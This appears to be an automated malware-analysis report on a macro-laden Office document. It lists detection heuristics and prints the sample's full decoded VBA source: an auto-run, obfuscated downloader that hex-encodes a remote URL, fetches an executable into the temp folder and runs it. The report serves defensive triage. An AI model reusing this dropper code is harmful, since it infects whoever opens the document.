MALICIOUS
406
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains obfuscated VBA macros that leverage the URLDownloadToFile API. This indicates the macro's intent is to download and execute a second-stage payload from a remote location. The presence of AutoOpen and Workbook_Open macros, along with critical heuristic firings for obfuscated loaders and execution tokens, strongly suggests a downloader functionality.
Heuristics 12
-
ClamAV: Doc.Downloader.Macr-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macr-2
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
dsfdsf = Shell(jghdfdfdfw, 1) -
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _ -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
dsfdsf = Shell(jghdfdfdfw, 1) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
jghdfdfdfw = Environ(HexToString("54454D50")) & HexToString("5C657267667265672E657865") -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7802 bytes |
SHA-256: 688fbb1d91dd660c5e3cdb480e8e976219759e7ec4cfbaf88ca619d9fdeb3df9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
79 of 128 identifiers look randomly generated (e.g. 'jghdfdfdfw') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal sdfdsf As LongPtr, _
ByVal dfsdfew As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As LongPtr) As LongPtr
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal sdfdsf As Long, _
ByVal dfsdfew As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
#End If
Sub uiwefds()
Dim PxxgBiNP As Integer
For PxxgBiNP = 0 To 3
Dim NIlZJTAZ As Integer
For NIlZJTAZ = 0 To 2
Dim SkHXFUCU As Integer
For SkHXFUCU = 0 To 9
DoEvents
Next SkHXFUCU
DoEvents
Next NIlZJTAZ
Dim kPqjFzTg As Integer
For kPqjFzTg = 0 To 5
DoEvents
Next kPqjFzTg
DoEvents
Next PxxgBiNP
Dim kYYYffQc As Integer
For kYYYffQc = 0 To 5
Dim ZwNyFHMZ As Integer
For ZwNyFHMZ = 0 To 1
DoEvents
Next ZwNyFHMZ
DoEvents
Next kYYYffQc
Dim iFwnFpAo As Integer
For iFwnFpAo = 0 To 6
DoEvents
Next iFwnFpAo
UGivgHgfdg
End Sub
Sub AutoOpen()
Dim bFcsplDg As Integer
For bFcsplDg = 0 To 7
Dim ShzVbLyO As Integer
For ShzVbLyO = 0 To 5
Dim oQYYiVIE As Integer
For oQYYiVIE = 0 To 9
DoEvents
Next oQYYiVIE
DoEvents
Next ShzVbLyO
Dim zbpkQrDX As Integer
For zbpkQrDX = 0 To 8
DoEvents
Next zbpkQrDX
DoEvents
Next bFcsplDg
Dim kIxlbfDj As Integer
For kIxlbfDj = 0 To 2
Dim dpNiQKzp As Integer
For dpNiQKzp = 0 To 1
DoEvents
Next dpNiQKzp
DoEvents
Next kIxlbfDj
Dim uVEKhVuZ As Integer
For uVEKhVuZ = 0 To 9
DoEvents
Next uVEKhVuZ
uiwefds
End Sub
Sub Workbook_Open()
Dim ftvowRbL As Integer
For ftvowRbL = 0 To 1
Dim fipkKjzB As Integer
For fipkKjzB = 0 To 4
Dim XyjJYqDQ As Integer
For XyjJYqDQ = 0 To 2
DoEvents
Next XyjJYqDQ
DoEvents
Next fipkKjzB
Dim ZvQsURmk As Integer
For ZvQsURmk = 0 To 7
DoEvents
Next ZvQsURmk
DoEvents
Next ftvowRbL
Dim YaKQIzva As Integer
For YaKQIzva = 0 To 8
Dim zbuUTilv As Integer
For zbuUTilv = 0 To 5
DoEvents
Next zbuUTilv
DoEvents
Next YaKQIzva
Dim WfPlofvJ As Integer
For WfPlofvJ = 0 To 4
DoEvents
Next WfPlofvJ
uiwefds
End Sub
Sub UGivgHgfdg()
Dim sjACsOEZ As Integer
For sjACsOEZ = 0 To 1
Dim PbqsdXKI As Integer
For PbqsdXKI = 0 To 2
Dim OYRHxAZy As Integer
For OYRHxAZy = 0 To 8
DoEvents
Next OYRHxAZy
DoEvents
Next PbqsdXKI
Dim ZliAaUUv As Integer
For ZliAaUUv = 0 To 7
DoEvents
Next ZliAaUUv
DoEvents
Next sjACsOEZ
Dim hJYYdjbg As Integer
For hJYYdjbg = 0 To 7
Dim jHPjjUXQ As Integer
For jHPjjUXQ = 0 To 7
DoEvents
Next jHPjjUXQ
DoEvents
Next hJYYdjbg
Dim pRfzMFar As Integer
For pRfzMFar = 0 To 6
DoEvents
Next pRfzMFar
dgjkhsd = HexToString("6874")
hdsfhjk = HexToString("74703A2F2F")
dhjkfsd = HexToString("3138382E3133322E3138332E3137393A383038302F6D6F7073692F706F7073692E706870")
ewrwedsf = dgjkhsd + hdsfhjk + dhjkfsd
Dim mgubxnIb As Integer
For mgubxnIb = 0 To 8
Dim YMlEFDdK As Integer
For YMlEFDdK = 0 To 2
Dim XqVdlrWe As Integer
For XqVdlrWe = 0 To 5
DoEvents
Next XqVdlrWe
DoEvents
Next YMlEFDdK
Dim GVZVCpNw As Integer
For GVZVCpNw = 0 To 6
DoEvents
Next GVZVCpNw
DoEvents
Next mgubxnIb
Dim ddFVFiMb As Integer
For ddFVFiMb = 0 To 8
Dim HGgNeqLB As Integer
For HGgNeqLB = 0 To 6
DoEvents
Next HGgNeqLB
DoEvents
Next ddFVFiMb
Dim VVaaqewe As Integer
For VVaaqewe = 0 To 7
DoEvents
Next VVaaqewe
jghdfdfdfw = Environ(HexToString("54454D50")) & HexToString("5C657267667265672E657865")
Dim JIXksrqo As Integer
For JIXksrqo = 0 To 6
Dim ZmuZuJAA As Integer
For ZmuZuJAA = 0 To 7
Dim wpZWyUKh As Integer
For wpZWyUKh = 0 To 8
DoEvents
Next wpZWyUKh
DoEvents
Next ZmuZuJAA
Dim RsHNlmzh As Integer
For RsHNlmzh = 0 To 7
DoEvents
Next RsHNlmzh
DoEvents
Next JIXksrqo
Dim wiPdQCYM As Integer
For wiPdQCYM = 0 To 6
Dim MvQkzilR As Integer
For MvQkzilR = 0 To 1
DoEvents
Next MvQkzilR
DoEvents
Next wiPdQCYM
Dim aUclpNWO As Integer
For aUclpNWO = 0 To 2
DoEvents
Next aUclpNWO
wqewr = URLDownloadToFile(0&, ewrwedsf, jghdfdfdfw, 0&, 0&)
Dim dsfdsf
Dim xajSsvKH As Integer
For xajSsvKH = 0 To 3
Dim XotIOnTN As Integer
For XotIOnTN = 0 To 4
Dim QcgeTjsF As Integer
For QcgeTjsF = 0 To 2
DoEvents
Next QcgeTjsF
DoEvents
Next XotIOnTN
Dim LAclisaB As Integer
For LAclisaB = 0 To 3
DoEvents
Next LAclisaB
DoEvents
Next xajSsvKH
Dim GCOldYPl As Integer
For GCOldYPl = 0 To 3
Dim xpAyowIw As Integer
For xpAyowIw = 0 To 6
DoEvents
Next xpAyowIw
DoEvents
Next GCOldYPl
Dim toTFvQyC As Integer
For toTFvQyC = 0 To 3
DoEvents
Next toTFvQyC
dsfdsf = Shell(jghdfdfdfw, 1)
End Sub
Public Function HexToString(ByVal dsfGHJsdf As String) As String
Dim cRFBGXaI As Integer
For cRFBGXaI = 0 To 3
Dim lqCjoUhY As Integer
For lqCjoUhY = 0 To 5
Dim fJrXjdhr As Integer
For fJrXjdhr = 0 To 7
DoEvents
Next fJrXjdhr
DoEvents
Next lqCjoUhY
Dim ibrXgwUZ As Integer
For ibrXgwUZ = 0 To 6
DoEvents
Next ibrXgwUZ
DoEvents
Next cRFBGXaI
Dim xDNrzEzH As Integer
For xDNrzEzH = 0 To 8
Dim JmAtuSal As Integer
For JmAtuSal = 0 To 1
DoEvents
Next JmAtuSal
DoEvents
Next xDNrzEzH
Dim BEgugREc As Integer
For BEgugREc = 0 To 2
DoEvents
Next BEgugREc
For y = 1 To Len(dsfGHJsdf)
Dim AuJDUKFJ As Integer
For AuJDUKFJ = 0 To 4
Dim UvHMzkjr As Integer
For UvHMzkjr = 0 To 1
Dim fHuPigTW As Integer
For fHuPigTW = 0 To 5
DoEvents
Next fHuPigTW
DoEvents
Next UvHMzkjr
Dim uRPwSwPf As Integer
For uRPwSwPf = 0 To 6
DoEvents
Next uRPwSwPf
DoEvents
Next AuJDUKFJ
Dim ezQsDXjM As Integer
For ezQsDXjM = 0 To 3
Dim WadqawBn As Integer
For WadqawBn = 0 To 4
DoEvents
Next WadqawBn
DoEvents
Next ezQsDXjM
Dim dVvhcepx As Integer
For dVvhcepx = 0 To 4
DoEvents
Next dVvhcepx
num = Mid(dsfGHJsdf, y, 2)
Dim PyxhKOLG As Integer
For PyxhKOLG = 0 To 2
Dim hZmZJOoa As Integer
For hZmZJOoa = 0 To 2
Dim ivsfJuvt As Integer
For ivsfJuvt = 0 To 9
DoEvents
Next ivsfJuvt
DoEvents
Next hZmZJOoa
Dim FQeVqElL As Integer
For FQeVqElL = 0 To 6
DoEvents
Next FQeVqElL
DoEvents
Next PyxhKOLG
Dim psmZGKbn As Integer
For psmZGKbn = 0 To 1
Dim AdqmlHZR As Integer
For AdqmlHZR = 0 To 4
DoEvents
Next AdqmlHZR
DoEvents
Next psmZGKbn
Dim maFtCXUC As Integer
For maFtCXUC = 0 To 2
DoEvents
Next maFtCXUC
uGHdsf = uGHdsf & Chr(CDbl("&h" & num))
Dim ibsiUdwv As Integer
For ibsiUdwv = 0 To 7
Dim sVEHRGPJ As Integer
For sVEHRGPJ = 0 To 4
Dim uUvhwdnW As Integer
For uUvhwdnW = 0 To 3
DoEvents
Next uUvhwdnW
DoEvents
Next sVEHRGPJ
Dim NmeaNlTf As Integer
For NmeaNlTf = 0 To 2
DoEvents
Next NmeaNlTf
DoEvents
Next ibsiUdwv
Dim yQiniWGp As Integer
For yQiniWGp = 0 To 6
Dim sagylpuI As Integer
For sagylpuI = 0 To 4
DoEvents
Next sagylpuI
DoEvents
Next yQiniWGp
Dim yFKJVhsa As Integer
For yFKJVhsa = 0 To 6
DoEvents
Next yFKJVhsa
y = y + 1
Next y
Dim pswwxpTG As Integer
For pswwxpTG = 0 To 4
Dim bwEKlAom As Integer
For bwEKlAom = 0 To 1
Dim dBxcXWVq As Integer
For dBxcXWVq = 0 To 8
DoEvents
Next dBxcXWVq
DoEvents
Next bwEKlAom
Dim TJtJSTmd As Integer
For TJtJSTmd = 0 To 4
DoEvents
Next TJtJSTmd
DoEvents
Next pswwxpTG
Dim yImZDVeo As Integer
For yImZDVeo = 0 To 7
Dim LoRMzhbw As Integer
For LoRMzhbw = 0 To 7
DoEvents
Next LoRMzhbw
DoEvents
Next yImZDVeo
Dim bxwRxDlo As Integer
For bxwRxDlo = 0 To 3
DoEvents
Next bxwRxDlo
HexToString = uGHdsf
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.